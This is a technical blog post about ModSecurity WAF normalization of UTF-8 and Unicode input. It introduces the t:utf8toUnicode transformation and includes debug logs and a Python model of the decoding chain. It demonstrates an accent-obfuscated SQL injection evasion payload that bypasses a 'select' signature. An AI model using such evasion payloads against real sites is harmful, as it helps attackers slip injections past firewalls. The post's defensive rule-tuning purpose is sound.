<h1>WAF Normalization and I18N</h1>Web application firewalls must be able to handle Internationalization (I18N) and thus properly handle various data encodings, including Unicode and UTF-8, in order not only to prevent evasion issues but also to minimize false positives. In an earlier blog post, we highlighted ModSecurity's <a href="http://blog.spiderlabs.com/2011/06/modsecurity-advanced-topic-of-the-week-unicode-mapping-support.html">new support for Unicode mapping and decoding</a>. This capability helps us to more accurately decode characters from different Unicode code points. While this certainly helps our accuracy, we still had the issue of UTF-8 encodings. This is a challenge for any WAF, as it must be able to handle UTF-8 encodings of characters for different languages such as Portuguese. So, if you are running ModSecurity to protect a non-English language website, then this blog post is for you! We introduce a new transformation function called <a href="https://sourceforge.net/apps/mediawiki/mod-security/index.php?title=Reference_Manual#utf8toUnicode">utf8toUnicode</a> that helps to normalize data for inspection.<br />
<br />
<h1>Incorrect UTF-8 Decoding</h1>We have received some <a href="http://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/2012-August/001164.html">recent reports of false positive issues</a> with the <a href="https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project">OWASP ModSecurity CRS</a> that were due to the presence of UTF-8 encoded characters. As an example, the Portuguese language has many "special" characters carrying different accents. For example:<br />
<br />
<pre>1- á Á ã Ã â Â à À
2- é É ê Ê í Í
3- ó Ó õ Õ ô Ô
4- ú Ú ü Ü
5- ç Ç</pre>When these characters are UTF-8 encoded, they use multiple bytes. As an example, the "ę" character is encoded as "%c4%99". If ModSecurity only applies the standard t:urlDecodeUni, it decodes each byte individually, which results in an impedance mismatch. In this case, the incorrect decoding resulted in a false positive match against some SQL Injection rules in the OWASP ModSecurity CRS. While this is a bit of a pain, it is not as bad as a <a href="http://intruders.org.br/artigos/waf_bypass_regex.pdf">false negative bypass situation that may be caused by this type of incorrect decoding</a>. Let's look at this type of SQL Injection evasion issue. What if we send the following request:<br />
<pre>http://172.16.51.132/index.php?foo='úníón+séléct+data+fróm+námés</pre>Let's see how ModSecurity will decode this data when checking for an example SQL Injection keyword:<br />
<pre><strong>Recipe:</strong> Invoking rule 21b67e38;
Rule 21b67e38: SecRule "ARGS:foo"
"@rx select"
"phase:2,log,auditlog,pass,id:1111,t:urlDecodeUni"
T (0) <strong>urlDecodeUni:</strong>
"'<strong>\xc3\xban\xc3\xad\xc3\xb3n s\xc3\xa9l\xc3\xa9ct
data fr\xc3\xb3m n\xc3\xa1m\xc3\xa9s</strong>"
Transformation completed in 13 usec.
Executing operator "rx" with
param "select" against ARGS:foo.
Target value:
"'\xc3\xban\xc3\xad\xc3\xb3n s\xc3\xa9l\xc3\xa9ct data fr\xc3\xb3m
n\xc3\xa1m\xc3\xa9s"
Operator completed in 7 usec.<strong>
Rule
returned 0</strong>.</pre><div style="text-align: justify;">As you can see above, the character sequence “<strong>úníón+séléct+data+fróm+námés</strong>” was handled by the engine as <strong>“\xc3\xban\xc3\xad\xc3\xb3n s\xc3\xa9l\xc3\xa9ct data fr\xc3\xb3m n\xc3\xa1m\xc3\xa9s”</strong>. However, the rule was looking for the pattern “<strong>select</strong>”. So, what happens if the application applies best-fit mapping conversions and removes the accents before sending the data to the database? This may allow the payload to bypass our signatures.</div><h1>Utf8 to Unicode Mapping</h1>In order to better handle this data, we should first map the UTF-8 encoded data to Unicode and then use the Unicode code point mapping capabilities mentioned at the beginning of the blog post. This configuration is achieved by first setting the <a href="https://sourceforge.net/apps/mediawiki/mod-security/index.php?title=Reference_Manual#SecUnicodeCodePage">SecUnicodeCodePage</a> and <a href="https://sourceforge.net/apps/mediawiki/mod-security/index.php?title=Reference_Manual#SecUnicodeMapFile">SecUnicodeMapFile</a> directives in your main ModSecurity configuration file:<br />
<pre>SecUnicodeCodePage 20127
SecUnicodeMapFile /etc/apache2/unicode.mapping
</pre>The SecUnicodeCodePage directive sets the Unicode code page used for your site; the example value 20127 is the US-ASCII code page. The SecUnicodeMapFile directive points to the <a href="http://mod-security.svn.sourceforge.net/viewvc/mod-security/m2/trunk/unicode.mapping">unicode.mapping file that comes with the ModSecurity source archive</a>, which includes all of the Unicode conversions. Here is an example of the 20127 (US-ASCII) mapping data:<br />
<pre><strong>20127 (US-ASCII)</strong>
00a0:20 00a1:21 00a2:63 00a4:24 00a5:59 00a6:7c 00a9:43 00aa:61
00ab:3c 00ad:2d 00ae:52 00b2:32 00b3:33 00b7:2e 00b8:2c 00b9:31 00ba:6f 00bb:3e
00c0:41 00c1:41 00c2:41 00c3:41 00c4:41 00c5:41 00c6:41 00c7:43 00c8:45 00c9:45
00ca:45 00cb:45 00cc:49 00cd:49 00ce:49 00cf:49 00d0:44 00d1:4e 00d2:4f 00d3:4f
00d4:4f 00d5:4f 00d6:4f 00d8:4f 00d9:55 00da:55 00db:55 00dc:55 00dd:59 00e0:61
00e1:61 00e2:61 <strong>00e3:61</strong> 00e4:61
00e5:61 00e6:61 <strong>00e7:63</strong> 00e8:65
00e9:65 00ea:65 00eb:65 00ec:69 00ed:69 00ee:69 00ef:69 00f1:6e 00f2:6f 00f3:6f
00f4:6f 00f5:6f 00f6:6f 00f8:6f 00f9:75 00fa:75 00fb:75 00fc:75 00fd:79 00ff:79
0100:41 0101:61 0102:41 0103:61 0104:41 0105:61 0106:43 0107:63 0108:43 0109:63
010a:43 010b:63 010c:43 010d:63 010e:44 010f:64 0110:44 0111:64 0112:45 0113:65
0114:45 0115:65 0116:45 0117:65 0118:45 0119:65 011a:45 011b:65 011c:47 011d:67
011e:47 011f:67 0120:47 0121:67 0122:47 0123:67 0124:48 0125:68 0126:48 0127:68
0128:49 0129:69 012a:49 012b:69 012c:49 012d:69 012e:49 012f:69 0130:49 0131:69
0134:4a 0135:6a 0136:4b 0137:6b 0139:4c 013a:6c 013b:4c 013c:6c 013d:4c 013e:6c
0141:4c 0142:6c 0143:4e 0144:6e 0145:4e 0146:6e 0147:4e 0148:6e 014c:4f 014d:6f
014e:4f 014f:6f 0150:4f 0151:6f 0152:4f 0153:6f 0154:52 0155:72 0156:52 0157:72
0158:52 0159:72 015a:53 015b:73 015c:53 015d:73 015e:53 015f:73 0160:53 0161:73
0162:54 0163:74 0164:54 0165:74 0166:54 0167:74 0168:55 0169:75 016a:55 016b:75
016c:55 016d:75 016e:55 016f:75 0170:55 0171:75 0172:55 0173:75 0174:57 0175:77
0176:59 0177:79 0178:59 0179:5a 017b:5a 017c:7a 017d:5a 017e:7a 0180:62 0189:44
0191:46 0192:66 0197:49 019a:6c 019f:4f 01a0:4f 01a1:6f 01ab:74 01ae:54 01af:55
01b0:75 01b6:7a 01cd:41 01ce:61 01cf:49 01d0:69 01d1:4f 01d2:6f 01d3:55 01d4:75
01d5:55 01d6:75 01d7:55 01d8:75 01d9:55 01da:75 01db:55 01dc:75 01de:41 01df:61
01e4:47 01e5:67 01e6:47 01e7:67 01e8:4b 01e9:6b 01ea:4f 01eb:6f 01ec:4f 01ed:6f
01f0:6a 0261:67 02b9:27 02ba:22 02bc:27 02c4:5e 02c6:5e 02c8:27 02cb:60 02cd:5f
02dc:7e 0300:60 0302:5e 0303:7e 030e:22 0331:5f 0332:5f 2000:20 2001:20 2002:20
2003:20 2004:20 2005:20 2006:20 2010:2d 2011:2d 2013:2d 2014:2d 2018:27 2019:27
201a:2c 201c:22 201d:22 201e:22 2022:2e 2026:2e 2032:27 2035:60 2039:3c 203a:3e
2122:54 ff01:21 ff02:22 ff03:23 ff04:24 ff05:25 ff06:26 ff07:27 ff08:28 ff09:29
ff0a:2a ff0b:2b ff0c:2c ff0d:2d ff0e:2e ff0f:2f ff10:30 ff11:31 ff12:32 ff13:33
ff14:34 ff15:35 ff16:36 ff17:37 ff18:38 ff19:39 ff1a:3a ff1b:3b ff1c:3c ff1d:3d
ff1e:3e ff20:40 ff21:41 ff22:42 ff23:43 ff24:44 ff25:45 ff26:46 ff27:47 ff28:48
ff29:49 ff2a:4a ff2b:4b ff2c:4c ff2d:4d ff2e:4e ff2f:4f ff30:50 ff31:51 ff32:52
ff33:53 ff34:54 ff35:55 ff36:56 ff37:57 ff38:58 ff39:59 ff3a:5a ff3b:5b ff3c:5c
ff3d:5d ff3e:5e ff3f:5f ff40:60 ff41:61 ff42:62 ff43:63 ff44:64 ff45:65 ff46:66
ff47:67 ff48:68 ff49:69 ff4a:6a ff4b:6b ff4c:6c ff4d:6d ff4e:6e ff4f:6f ff50:70
ff51:71 ff52:72 ff53:73 ff54:74 ff55:75 ff56:76 ff57:77 ff58:78 ff59:79 ff5a:7a
ff5b:7b ff5c:7c ff5d:7d ff5e:7e</pre>With these Unicode mapping directives in place, we now can use the new t:utf8toUnicode transformation function which was just added to the v2.7.0 code. Here is a new example rule:<br />
<pre>SecRule "ARGS:foo" "@rx select" "phase:2,log,auditlog,pass,id:1111,<span style="background-color: yellow;"><strong>t:utf8toUnicode,t:urlDecodeUni</strong></span>"</pre>Let's see how ModSecurity will handle the same request, but now using the mentioned features:<br />
<br />
<pre><strong>Recipe:</strong> Invoking rule 21717d58;
Rule 21717d58: SecRule "ARGS:foo"
"@rx select"
"phase:2,log,auditlog,pass,id:1111,t:utf8toUnicode,t:urlDecodeUni"
T (0) <strong>Utf8toUnicode</strong>:
"'<strong>%u00fan%u00ed%u00f3n
s%u00e9l%u00e9ct data fr%u00f3m n%u00e1m%u00e9s"</strong>
T (0) <strong>urlDecodeUni</strong>:
"<strong>'union select data from names</strong>"
Transformation completed in 29 usec.
Executing operator "rx" with
param "select" against ARGS:foo.
Target value: "'union select data from
names"
Operator completed in 16 usec.
Warning. Pattern match "select"
at ARGS:foo.<strong>
Rule
returned 1.</strong>
</pre>As you can see, the sequence <strong>“úníón+séléct+data+fróm+námés”</strong> is now normalized to <strong>“union select data from names”</strong> and thus the rule matched. Summarizing the engine steps for data normalization:<br />
<ol><li>Attacker input: úníón+séléct+data+fróm+námés</li>
<li>Input in UTF-8 format: \xc3\xban\xc3\xad\xc3\xb3n s\xc3\xa9l\xc3\xa9ct data fr\xc3\xb3m n\xc3\xa1m\xc3\xa9s</li>
<li>Input in Unicode format: %u00fan%u00ed%u00f3n s%u00e9l%u00e9ct data fr%u00f3m n%u00e1m%u00e9s</li>
<li>Input in ASCII format: union select data from names</li>
</ol><div style="text-align: justify;">With this new UTF-8 and Unicode mapping and decoding support, ModSecurity can now more accurately normalize data from non-English languages, which results in better rule accuracy.</div></div>
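To make the three normalization steps above concrete, here is a small Python model of the transformation chain. It is added for this page and is not ModSecurity's code: it reproduces the byte-wise decode that missed "select", a utf8toUnicode-style step, and urlDecodeUni with the handful of 20127 best-fit entries the payload needs. The payload and the invalid-UTF-8 sample are constructed, and keeping invalid bytes as %XX escapes is an assumption of the model rather than documented ModSecurity behaviour.<br />

```python
"""Model of the normalization chain the post walks through: percent-encoded
UTF-8 -> %uXXXX (t:utf8toUnicode) -> best-fit ASCII (t:urlDecodeUni + map).
Illustrative code written for this page, not ModSecurity's implementation."""
import re
from typing import Callable, Dict, List, Tuple
from urllib.parse import unquote_to_bytes

# Subset of the 20127 (US-ASCII) best-fit table quoted in the post
# (Unicode code point -> ASCII byte); only what the samples below need.
BEST_FIT_20127: Dict[int, int] = {
    0x00E0: 0x61, 0x00E1: 0x61, 0x00E2: 0x61, 0x00E3: 0x61,  # à á â ã -> a
    0x00E7: 0x63, 0x00E9: 0x65, 0x00EA: 0x65, 0x00ED: 0x69,  # ç é ê í -> c e e i
    0x00F3: 0x6F, 0x00F5: 0x6F, 0x00FA: 0x75, 0x00FC: 0x75,  # ó õ ú ü -> o o u u
    0x0119: 0x65, 0x2019: 0x27,                              # ę -> e, ’ -> '
}

# Constructed sample: the post's payload as a browser percent-encodes it
# ("'úníón séléct data fróm námés" in UTF-8, '+' for spaces).
PAYLOAD = "%27%C3%BAn%C3%AD%C3%B3n+s%C3%A9l%C3%A9ct+data+fr%C3%B3m+n%C3%A1m%C3%A9s"
RULE = re.compile(r"select")  # the @rx operator of the example rule


def url_decode_bytewise(value: str) -> str:
    """Plain t:urlDecodeUni on raw UTF-8: each %XX becomes one character, with
    no multibyte reassembly. latin-1 gives one char per byte, i.e. the
    \\xc3\\xba view of the first debug log."""
    return unquote_to_bytes(value.replace("+", " ")).decode("latin-1")


def utf8_to_unicode(value: str) -> str:
    """Model of t:utf8toUnicode: percent-decode, reassemble UTF-8 sequences into
    code points and re-emit non-ASCII ones as %uXXXX. Bytes that are not valid
    UTF-8 are left as %XX escapes (an assumption of this model)."""
    raw = unquote_to_bytes(value.replace("+", " "))
    out: List[str] = []
    i = 0
    while i < len(raw):
        lead = raw[i]
        if lead < 0x80:                  # ASCII passes through untouched
            out.append(chr(lead))
            i += 1
            continue
        # Sequence length from the lead byte; 0 marks an illegal lead byte.
        n = 2 if 0xC2 <= lead <= 0xDF else 3 if 0xE0 <= lead <= 0xEF \
            else 4 if 0xF0 <= lead <= 0xF4 else 0
        chunk = raw[i:i + n]
        try:
            if n == 0 or len(chunk) < n:
                raise ValueError("truncated or illegal UTF-8 sequence")
            out.append("%%u%04x" % ord(chunk.decode("utf-8")))
            i += n
        except (UnicodeDecodeError, ValueError):
            out.append("%%%02x" % lead)  # keep the stray byte encoded
            i += 1
    return "".join(out)


def url_decode_uni(value: str, best_fit: Dict[int, int]) -> str:
    """Model of t:urlDecodeUni with SecUnicodeCodePage/SecUnicodeMapFile set:
    %uXXXX is best-fit mapped when the table has an entry (else kept as the
    code point itself), %XX becomes one byte, '+' becomes a space."""
    def repl(m: "re.Match[str]") -> str:
        if m.group(1):
            cp = int(m.group(1), 16)
            return chr(best_fit.get(cp, cp))
        return chr(int(m.group(2), 16))
    pattern = r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})"
    return re.sub(pattern, repl, value.replace("+", " "))


def rule_matches(value: str, transforms: List[Callable[[str], str]]) -> Tuple[bool, str]:
    """Apply the transformation chain in order, then run the @rx operator.
    Returns (matched, the target value the operator actually saw)."""
    for transform in transforms:
        value = transform(value)
    return bool(RULE.search(value)), value


if __name__ == "__main__":
    with_map = lambda v: url_decode_uni(v, BEST_FIT_20127)
    print("t:urlDecodeUni only          ->", rule_matches(PAYLOAD, [url_decode_bytewise]))
    print("t:utf8toUnicode,t:urlDecodeUni ->", rule_matches(PAYLOAD, [utf8_to_unicode, with_map]))
```

The same chain applied to the post's "%c4%99" (ę) example yields "e" via the 0119:65 table entry, which is why a single-byte decode of that pair can trip rules that the mapped form does not.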